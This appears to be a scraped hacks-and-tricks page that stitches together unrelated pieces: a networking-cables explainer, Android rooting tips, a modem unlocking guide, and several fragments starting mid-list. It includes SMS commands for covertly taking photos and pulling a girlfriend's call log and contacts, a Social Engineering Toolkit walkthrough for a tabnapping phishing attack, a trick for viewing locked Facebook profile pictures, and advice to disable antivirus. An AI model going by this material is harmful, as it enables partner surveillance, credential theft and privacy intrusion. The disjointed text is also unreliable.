Networking Cables

Networking cables are used to connect one network device to other network devices or to connect two or more computers to share printer, scanner etc. Different types of network cables like Coaxial cable, Optical fiber cable, Twisted Pair cables are used depending on the network's topology, protocol and size. The devices can be separated by a few meters (e.g. via Ethernet) or nearly unlimited distances (e.g. via the interconnections of the Internet).

While wireless may be the wave of the future, most computer networks today still utilize cables to transfer signals from one point to another.

Twisted pair

Twisted pair cabling is a form of wiring in which pairs of wires (the forward and return conductors of a single circuit) are twisted together for the purposes of canceling outelectromagnetic interference (EMI) from other wire pairs and from external sources. This type of cable is used for home and corporate Ethernet networks.

There are two types of twisted pair cables: shielded, unshielded.

Fiber Optic cable

An optical fiber cable consists of a center glass core surrounded by several layers of protective material. The outer insulating jacket is made of Teflon or PVC to prevent interference. It is expensive but has higher bandwidth and can transmit data over longer distances.

Coaxial cable

Coaxial lines confine the electromagnetic wave to area inside the cable, between the center conductor and the shield. The transmission of energy in the line occurs totally through the dielectric inside the cable between the conductors. Coaxial lines can therefore be bent and twisted (subject to limits) without negative effects, and they can be strapped to conductive supports without inducing unwanted currents in them and though.

The most common use for coaxial cables is for television and other signals with bandwidth of multiple megahertz. Although in most homes coaxial cables have been installed for transmission of TV signals, new technologies (such as the ITU-T G.hn standard) open the possibility of using home coaxial cable for high-speed home networking applications (Ethernet over coax).

In the 20th century they carried long distance telephone connections.

Patch cable

A patch cable is an electrical or optical cable used to connect one electronic or optical device to another for signal routing. Devices of different types (e.g. a switch connected to a computer, or a switch connected to a router) are connected with patch cords. It is a very fast connection speed. Patch cords are usually produced in many different colors so as to be easily distinguishable,^[2] and are relatively short, perhaps no longer than two meters.

Ethernet (crossover) cable

An Ethernet crossover cable is a type of Ethernet cable used to connect computing devices together directly where they would normally be connected via a network switch, hub orrouter, such as directly connecting two personal computers via their network adapters. Some newer Ethernet devices support the use of cross-over cables in the place of patch cables.

Power lines

Although power wires are not designed for networking applications, new technologies like Power line communication allows these wires to also be used to interconnect home computers, peripherals or other networked consumer products. On December 2008, the ITU-T adopted Recommendation G.hn/G.9960 as the first worldwide standard for high-speed powerline communications.^[3] G.hn also specifies communications over phonelines and coaxial cables.

1. Open the facebook profile of person whose profile picture is locked or is set to private.

2. Right click on the profile picture and click on Copy Image Url as shown in image below.

3. Open that image in new tab by right clicking and selecting Paste (CTRL + V)
4. Now change the value of image size highlighted below which might be s160x160 tos720x720 (If its not clear try (s320x320)

5. The image will enlarge in size. This trick does not always work.

Overclock your phone

If you want to eek out every last bit of power from your phone then you need to overclock it. Overclocking is the act of telling the processor to run at a faster speed than it was initially intended to and you can often gain 10%-15% extra speed without any problems. Download and install SetCPU from the Play Store. Under the Main settings you’ll see the maximum and minimum possible speeds (you will need to be running a ROM that supports overclocking). Just move the sliders to your desired speeds and tick the Set on Boot option. Use small steps at first to find the setting that is best for your needs.

Get longer battery life

The latest breed of dual and quad core processors in our Android phones do a good job of power management but you can squeeze a little more power out of your phone’s battery by taking the multi-core management into your own hands. CPU Sleeper Dual Core and CPU Sleeper Quad Core are two apps that shut down the extra cores when the device is in standby mode and they aren’t needed. Some processors will handle this by default, so your results may vary.

Force Chrome into desktop mode

Chrome is a fantastic browser but it has one serious limitation – there’s no global setting to force the app to always download the desktop version of a website. On a tablet such as the Nexus 7 this is especially annoying. There is a simple fix: create a blank file called chrome-command-line (make sure there’s no file extension) and drop it into the /data/local/ folder. Then use ES File Explorer with root access turned on to change the permissions of that file (tap and hold on the file and select Details) to RWE RE RE. A quick restart will finish the job.

Remove bloatware

Almost all Android phones come with a boatload of additional apps installed, some that you use, and usually plenty that you don’t. If your phone is rooted you can blitz those unwanted apps. Get the Titanium Backup app from the Play Store, view your full list of apps and identify the ones you want to remove. By tapping and holding on the app name you can choose to Freeze the app – this prevents it from running and removes it from the app drawer – or to uninstall it. Freezing is the best first step, if only to ensure there are no adverse side effects. Note that if you choose to freeze or remove the launcher, such as TouchWiz on a Samsung phone, you will need to have another launcher installed, or your phone won’t boot. To be on the safe side make sure you’ve got a Nandroid backup to roll back to.

Speed up boot time

When you turn on your phone many handsets will scan the system for new media content that has been added. It speeds up your access to that media but slows down the boot process. The app Rescan Media ROOT prevents media from being scanned at boot, which in turn enables your phone to start up quicker. You need to be rooted for it to work, and remember that your media apps will have to scan for new content when you open them.

3) Write "DEFRINGTONE" without Quotes and Send it to your girlfriend's mobile number..this will play the default ringtone on your girlfriend's phone.

4) Write "SENDPHOTO youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number.it will take the photo of current location of your girlfriend and send it to the email address specified in the SMS as a attachment.it will also send a confirmation message to your number.

5) Write "SENDCALLLOG youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number ..it will send all the call details like incoming calls,outgoing calls,missed calls to the email address specified in the SMS.

6) Write "SENDCONTACTLIST youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number ..it will send all the Contact list to the email address specified in the SMS.

First of all find your BT IP to create server of Tabnapping attack
>> go on > Terminal (Command Box) > type ( ifconfig ) and hit Enter and Copy your I.P >>> as shown in Image !!

This Hacking trick is called as a Tabnapping Attack it is same as Phishing but without Hosting your files.

# Let's start Hacking !! start your BT go on > Applications > Exploitation Tools > Social Engineering Tools > Social Engineering Toolkit > set

# Now you will see 'set' attack has started

# Select option 2 (Website attack vectors) from the menu, type 2 hit Enter. as shown in the Image !!

# Select option 4 (Tabnapping Attack Method)

# Again Select option 2 ( Site Cloner)

# Paste your I.P address you have copied in step 1 & Hit Enter

How to unlock your IDEA 2g/3g net setter

Few months back idea has launched 3g huawei usb modem which is having max speed of 7.2mbps but main problem was it can be unlocked using firmware upgrade or downgrade because its having customized firmware so our team was working on it from few months. last week we have also written the article which is on unlock e1732 using dc unlocker but main drawback was its not free it require some credits but finally i am here with a permanent solution for E1732 which is totally free so go ahead and unlock your E1732 which is locked from last 5 months

You will require following files to do this trick

Steps you have to Follow

First of all download all requirements (you may need to disable your antivirus)
Plug your E1732 with any other operator sim and let it install its driver
Now just Right click on your MY COMPUTER ICON >> PROPERTIES >> DEVICE MANAGER >>Ports (COM & LPT) then you can see there something like HUAWEI Mobile Connect – 3G Application Interface (COM8) then com8 is your systems port number please note the port number
Now Run CDMA WOrkshop.Exe and Click on Main and select the com port number in COM Settings (AT mode)box.
Then You have to click on Connect
Then Click On Read and Let it read your modem information and you can see your modem information on left panel.
Now Click on Security Tab >> Spc >> Default (nv_read) as SPC and Type 000000 in blank box and click on Spc and you can see the pop up window click on SEND.
Now Just Navigate to Memory Tab >> NV Items >> And Click On Read you can see on pop up box now click on OK.
Now you can see onw NV Backup Box now in Last NV Item box type 9999 and click on okand save it with any name. and it will backup your data let it be complete to 100% . andminimize CDMA Work Shop
Now Run E1732 Downgreder >> Accept Terms and Conation >> Then Click On Next and it will read your modem let it be finish then it will show your modem data then click on Start.
In the process you will get massage like update failure after downloading program. then dont worry and click on OK.
Then Again Come on CDMA Workshop and come on Main Tab and click on Disconnect and unplug your modem
Now Again Plug your modem and Run CDMA Workshop and check and select Com port as pr we have done previously
Then come on CDMA wokrshop and Select Com Port and click on Connect and navigate toMemory Tab >> NV ITEMS >> Click On Write >> now you can see one confirm box click on OK. then Click on Open then borwse and select the file which we have saved before
When the process will reach at 100% you can see success message then click on OK and From Main Tab Disconnect your modem and you are Done
